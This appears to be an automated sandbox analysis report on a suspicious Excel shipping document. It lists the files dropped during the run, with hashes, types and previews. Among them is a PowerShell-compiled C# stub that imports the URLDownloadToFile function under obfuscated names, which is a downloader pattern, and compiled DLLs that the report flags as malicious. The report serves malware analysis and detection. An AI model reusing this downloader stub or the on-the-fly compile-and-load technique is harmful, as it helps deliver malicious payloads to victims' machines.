SSDEEP:	3072:L+6i9zy7v2/uEB1A/meRlmRYT9FANxg2WUZUKdRLuk0VgHPLk9CVi:LKERludvLuk0Vgk9CVi
MD5:	EF3C18CC49B02153C770DB977B2E7435
SHA1:	D436E0F820DDBBA10DB4D3F1243ED3AA6468C057
SHA-256:	F328FB5B6055B687344190BB13D8DD6CDF6EA76D4AAAE6C5112DEC1B32ACE3C2
SHA-512:	2081EF5EE87A360894B8726494F30DFEEFF7D922E733D2E633A3D010DE56C6A4CAEADEEBE4CD12A28658AE250ADE3B093F2FAB032B92A31D511D9C99A12AF337
Malicious:	false
Preview:	....l...........I...R............:...).. EMF................................8...X....................?...........................................:...)..........J...S...Q...............I...R...................J...S...P...(...x........... ....:...)..(...J...S.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E75CCB56.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	3064680
Entropy (8bit):	1.8507381356738084
Encrypted:	false
SSDEEP:	6144:NaeRlcBvLukyV6kTCVQKERludvLuk0Vgk9CVX:oeRlM7kmERlyDku
MD5:	93774BB9AECD3837D6496AE965D1BD80
SHA1:	AE60D6A30E74BB5BE492CA71B82205D5C6B850C4
SHA-256:	6CDB58A3C6906A6DD49DB83340ACC7AF0B7C7BBA5C01D8B0A9F562AEBDC85897
SHA-512:	3810C4CDE003BAF916D626A41C0534BF421F5CDBF64D897F385FEDA36F556B6FECC27DB294A39F89C82DF0570424DE2EBB789E0B2294D42BFF80A64756257BD6
Malicious:	false
Preview:	....l............................]..WT.. EMF....h...........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................2......."...........!...............................................2......."...........!...............................................2......."...........!...............................................2.......'.......................%...........................................................L...d.......L.......!.......L...........!..............?...........?................................L...d...y...Y...........y...Y.......[...!..............?...........?................................'.......................%...................................&...

C:\Users\user\AppData\Local\Temp\0f4grbf3.czw.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\4ap1zdk3.c5k.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\4i1jhsy0\4i1jhsy0.0.cs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (372)
Category:	dropped
Size (bytes):	484
Entropy (8bit):	3.8560947564999073
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zu9l3NPMGHvQXReKJ8SRHy4HXQrBSOscVdmevvIy:V/DTLDfuhAXfHDQjmeYy
MD5:	FE82050659A8B97690D60529499222C1
SHA1:	7CC50135852B46DD1E36F2FF98506613DB525A68
SHA-256:	64C38563C4588B718B03AEC685677F173456D3C961EF97CD95E7784EE1E51A6A
SHA-512:	59356FD5CBB38A06BF09E182B8ED7C7C2200E6F8DE8E950BE38BEE0C45AA96B2DBF202BDC56097A74ACC4E0A8BC601558E83C098A376630CFA1BCCE64133D64F
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace WPfW.{. public class dXGM. {. [DllImport("urlmON", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr ZPntVsRhAh,string MyjpqIkQwDb,string ujQQpSXoIWy,uint M,IntPtr aYypvlykpe);.. }..}.

C:\Users\user\AppData\Local\Temp\4i1jhsy0\4i1jhsy0.cmdline

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
Category:	dropped
Size (bytes):	369
Entropy (8bit):	5.282873857465897
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23f7P1Tv1bhGzxs7+AEszIP23f7P1Tv1bhb:p37Lvkmb6KzJhhGWZEoJhhb
MD5:	9746FFBE88719BDF17A45237B50BE6CF
SHA1:	4B46766F41F946A63A09F5330562120464F08350
SHA-256:	F3A33C35840C8ED04E01FB2D895F5150D1C51F02D8D169CEDE01B66091082826
SHA-512:	4ABD4C10F7DFBD746EC84A32422B7D5109B698B7E4A6E99CD11B3F47285B95216788E72735D33B5541E1F749953A5D0C01867A981C91779FE5501D6B6DFDBC93
Malicious:	false
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\4i1jhsy0\4i1jhsy0.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\4i1jhsy0\4i1jhsy0.0.cs"

C:\Users\user\AppData\Local\Temp\4i1jhsy0\4i1jhsy0.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3072
Entropy (8bit):	2.8560436564487413
Encrypted:	false
SSDEEP:	24:etGSHPBG5eAdF8qdd/ka5AYd1doTqtkZf4peYOMEWI+ycuZhNJuakSAvPNnq:6wsAdeqZd1duJ4prOMn1ulJua3Atq
MD5:	4B26E03E9260E54FE700AF34609C59C2
SHA1:	42CAD08622BEFE8766F20D84339DDBBE237AC1F0
SHA-256:	EADDA44AC12E5FD9EE4CCF9B04AE7F015417F20DCDD7DA6D57EF57B9D9DADF17
SHA-512:	15B61E53DF927B15D82665C45A381A0BAC0A59A7E66A5F9B90E78441E9C52EAE67643A86D5D27EB470C75216982C16385FC09409926BBFD7B0B6165A4FEFC51F
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....\|>g...........!.................#... ...@....... ....................................@.................................`#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....BSJB............v4.0.30319......l.......#~...... ...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................1....................................................... 8.....P ......J.........P.....[.....g.....s.....u...J.....J...!.J.....J.......!.....*.......8.......................................!..........<Module>.4i

C:\Users\user\AppData\Local\Temp\4i1jhsy0\4i1jhsy0.out

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
Category:	modified
Size (bytes):	866
Entropy (8bit):	5.352214071390421
Encrypted:	false
SSDEEP:	24:AId3ka6KzJhFEoJhEKaMD5DqBVKVrdFAMBJTH:Akka60JhFEoJhEKdDcVKdBJj
MD5:	6D954D6192D8F051D2DEAC34B811A256
SHA1:	23FAA5C8703135D7F68DE7B6DDAEDE5A9F3DD7ED
SHA-256:	AD8ED517E65EC8D787F2CA5DD23440DE965D494A77FE2D0E0C1E67DC04DE91E5
SHA-512:	054652AC9D2CE44082F9C344298F2DF95E6DB0D66528AF238B8EC27EF8045541955AE7F1570B8AFF4DC26550FF7D79BB6901ECBB829B83A61FB088B0801014FA
Malicious:	false
Preview:	.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\4i1jhsy0\4i1jhsy0.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\4i1jhsy0\4i1jhsy0.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\4i1jhsy0\CSC6DB7E53F49C54638AC449C3AA969DEC.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.0945287450824543
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryzuak7YnqqAvPN5Dlq5J:+RI+ycuZhNJuakSAvPNnqX
MD5:	63B036B50A34A72B93E3F6049F537BCC
SHA1:	E3073564773303514B2F81000F46CA0FCE378DC3
SHA-256:	CC58D3286C2C391AF98EBCAC7A29011FAD11F7BAF235DC36ED2B12801349F72E
SHA-512:	B86980F9C99E93FA835FE1AA6D124974B3300702E67838433A578DA26505C201A49471979F0444C5E0179580FDFB4BD392E0B1506BBD4027A2964024D056BC46
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...4.i.1.j.h.s.y.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...4.i.1.j.h.s.y.0...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\4wd0ypsj.x03.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\5iazu0ou.puw.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\PORTS SITUATION BULK CARRIERS.xlsx

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Microsoft Excel 2007+
Category:	dropped
Size (bytes):	24052
Entropy (8bit):	7.652425367216495
Encrypted:	false
SSDEEP:	384:EaNYaTXe5BPJ2cpRYnyAt3TtsVaWtmGJA8+6qdPGlDLRoucPQFVJG:Ea6aje5BP7RMYt9h44wQFV4
MD5:	AE24ADB29E22854D176245019B60E937
SHA1:	28E9F74782AA0D138EE52E3191248F827BF27A1D
SHA-256:	5BF5C455288A0B5184B23744506939B604BF402E346AFAE18269BBE888412129
SHA-512:	10AE2624E874CBA663DA08AA0C0FEBE19421FD01F72D54957F22A028A58A33BD4078C6A9CCA7CDAB94FC59030894BEA018141E6920AF4E926155C7EE49B6507D
Malicious:	false
Preview:	PK..........!..B.....@.......[Content_Types].xml ...(.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................T.N.0..W.."o.....U.aAaY...`.5~...3....3(ME3.Dy..\|..W[...hch.y........V.z../E...Q..h..P\..,.w.....[....R...+lb.._..."~.k...5....1....`....t..Qu...{%O6..z._.j.J.Y....`>.......g..S.e.. .-3.. bc(.jy..5P.L?.g..u......{.%b..ZP.N..s........G....s..6....`o.N0.........\|.<FTM.=..k...7.N.4......p..sL(....@....N...,.s......C.Q........?........:.r...=;q.G....`..O...G.O.)..N...A...i.....o.......PK..........!...%S............_rels/.rels ...(.................................

C:\Users\user\AppData\Local\Temp\PORTS SITUATION BULK CARRIERS.xlsx:Zone.Identifier

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:gAWY3n:qY3n
MD5:	FBCCF14D504B7B2DBCB5A5BDA75BD93B
SHA1:	D59FC84CDD5217C6CF74785703655F78DA6B582B
SHA-256:	EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
SHA-512:	AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
Malicious:	false
Preview:	[ZoneTransfer]..ZoneId=3..

C:\Users\user\AppData\Local\Temp\RES1ED7.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Thu Nov 21 00:20:44 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1328
Entropy (8bit):	3.9835708341998624
Encrypted:	false
SSDEEP:	24:H1e9Eurkn/dHSwKdNWI+ycuZhNtJakSk+PNnqSqd:8rknFJKd41ulba33qSK
MD5:	8F2D78B4156CB0007883849421EC80CC
SHA1:	4EA4388C59A1BDE242BA82A7F6C03538A6DA5C53
SHA-256:	EFB2CC616EAE26E9C05C1A62F6368C27774F73302B74F88DC0E3393D6E17F609
SHA-512:	E44C64CA36BD22A482110D2CD3CD621A9B88D3A12C68690EF661356E9A1D512185695CC18F658C714AF478C3A89E9301C3C623D6AB8929B0DB4770DFCD4D2544
Malicious:	false
Preview:	L....\|>g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\fkur3fvp\CSC55312E8BACB34CD3B1B97BFED1B34D9.TMP..................JB`....**.<.#3..........4.......C:\Users\user\AppData\Local\Temp\RES1ED7.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...f.k.u.r.3.f.v.p...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

C:\Users\user\AppData\Local\Temp\RES8B10.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Thu Nov 21 00:21:12 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1328
Entropy (8bit):	3.991894743670352
Encrypted:	false
SSDEEP:	24:Hpe9EurJaHZdHdEwKdNWI+ycuZhNJuakSAvPNnqSqd:grJaP9LKd41ulJua3AtqSK
MD5:	67C2E1FD97FD2CC7F15539F2C29EEC6F
SHA1:	AF09D91D7F4375D77971DC4A1F2A7BFE049F82B3
SHA-256:	046B15EA38444E766EC2A1AF422D45015C8679ECFF03195FEBDA3FD15D385175
SHA-512:	2AFA216423DAE4601D6834DA7C6540E905ED49DD650BC3E958951C1CC4AC5FF3B22EC1A81958E3CA4FF64D743054733C00864F310808CA3A8285253B1040B793
Malicious:	false
Preview:	L....\|>g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\4i1jhsy0\CSC6DB7E53F49C54638AC449C3AA969DEC.TMP................c.6..4.+.....S{...........4.......C:\Users\user\AppData\Local\Temp\RES8B10.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...4.i.1.j.h.s.y.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

C:\Users\user\AppData\Local\Temp\a1epbfdg.taw.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\bak0l2x1.xpz.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\drg2idtr.zdr.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\fkur3fvp\CSC55312E8BACB34CD3B1B97BFED1B34D9.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.114042998265125
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry3Jak7Ynqqk+PN5Dlq5J:+RI+ycuZhNtJakSk+PNnqX
MD5:	882E4A426091ACF7082A2A083C002333
SHA1:	FF03C7C42665847C861FC9A0D761ED64881B560A
SHA-256:	85E57580EB579B0D7DEA5E982C78649F6F2366C1926BE6ACD1FF893855019620
SHA-512:	4846239CA3B85DCC8F03EA4C0FC20081D89D2AD08DCB591BF2751CFE1A3FE77D7A4502A5D0168A91BBFF09C752BB792556BD16DB9A30C40EE0ABA3C891B40F05
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...f.k.u.r.3.f.v.p...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...f.k.u.r.3.f.v.p...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\fkur3fvp\fkur3fvp.0.cs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (372)
Category:	dropped
Size (bytes):	484
Entropy (8bit):	3.8560947564999073
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zu9l3NPMGHvQXReKJ8SRHy4HXQrBSOscVdmevvIy:V/DTLDfuhAXfHDQjmeYy
MD5:	FE82050659A8B97690D60529499222C1
SHA1:	7CC50135852B46DD1E36F2FF98506613DB525A68
SHA-256:	64C38563C4588B718B03AEC685677F173456D3C961EF97CD95E7784EE1E51A6A
SHA-512:	59356FD5CBB38A06BF09E182B8ED7C7C2200E6F8DE8E950BE38BEE0C45AA96B2DBF202BDC56097A74ACC4E0A8BC601558E83C098A376630CFA1BCCE64133D64F
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace WPfW.{. public class dXGM. {. [DllImport("urlmON", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr ZPntVsRhAh,string MyjpqIkQwDb,string ujQQpSXoIWy,uint M,IntPtr aYypvlykpe);.. }..}.

C:\Users\user\AppData\Local\Temp\fkur3fvp\fkur3fvp.cmdline

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
Category:	dropped
Size (bytes):	369
Entropy (8bit):	5.252247579040391
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fy40zxs7+AEszIP23fy9An:p37Lvkmb6KzCWZEoH
MD5:	2262BD2158E3397619564C8BD6A44A84
SHA1:	75FEDB3B4795A6D2C0962C7781D6914ABBFAB8FD
SHA-256:	00E96CB21D7B29589D80DDBE83DC2D5489157F58F08799B0A945BA7AA4FF93CB
SHA-512:	6ACB68C3F5A0CCECCA408FF70416BF7CFC09A4D609EC61B3FC75CB65A971D33958E5B7688911FF6D5091BFECB748085B3CD4423685A8127890BC4DF2C8F32591
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\fkur3fvp\fkur3fvp.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\fkur3fvp\fkur3fvp.0.cs"

C:\Users\user\AppData\Local\Temp\fkur3fvp\fkur3fvp.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3072
Entropy (8bit):	2.858740152491107
Encrypted:	false
SSDEEP:	24:etGS0ePBG5eAdF8qdd/ka5AYcoTqtkZft/zmVTMEWI+ycuZhNtJakSk+PNnq:6ksAdeqZcuJtAMn1ulba33q
MD5:	0623A09AECDF11C993091F6D9994F3EC
SHA1:	91AEA0DF5BC0861CF273C5C8A6F0BAB431B807AB
SHA-256:	B784BA2966EFB47B4263FB7A7F7973EA3A7E35FABC29173D92C6FB50EA42B3A9
SHA-512:	9C6003CDEE13124C79155B2E70CF76C94C3DD24E7089E0A19F60AC0D5669CA8D4D0B50A827A2EAAAF57CC822065077648CE8B6D4E491D5F84287FA7A7C81C365
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....\|>g...........!.................#... ...@....... ....................................@.................................`#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....BSJB............v4.0.30319......l.......#~...... ...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................1....................................................... 8.....P ......J.........P.....[.....g.....s.....u...J.....J...!.J.....J.......!.....*.......8.......................................!..........<Module>.fk

C:\Users\user\AppData\Local\Temp\fkur3fvp\fkur3fvp.out

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
Category:	modified
Size (bytes):	866
Entropy (8bit):	5.330346238545341
Encrypted:	false
SSDEEP:	24:AId3ka6KzzEoOKaMD5DqBVKVrdFAMBJTH:Akka60zEoOKdDcVKdBJj
MD5:	7BA58661A31B8AF1D9E013DDD2BA67AC
SHA1:	628AD011C41BEC7EC67938FA660970BBB92A0B9F
SHA-256:	208B42690C4876F7F30C0DB226A28FDD3841A7BF20F334939CD5C79E2461FF3F
SHA-512:	3DE256E0822823D76519404F4A78A93DF8A88920164F7A1AD9C3F6CD95AB2D32679A6BE5B764743EF2E89B3B42B1334FEE2F8CB9E9B0E28F01F59A7C392EC66D
Malicious:	false
Preview:	.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\fkur3fvp\fkur3fvp.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\fkur3fvp\fkur3fvp.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\gyzoubn4.ksk.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
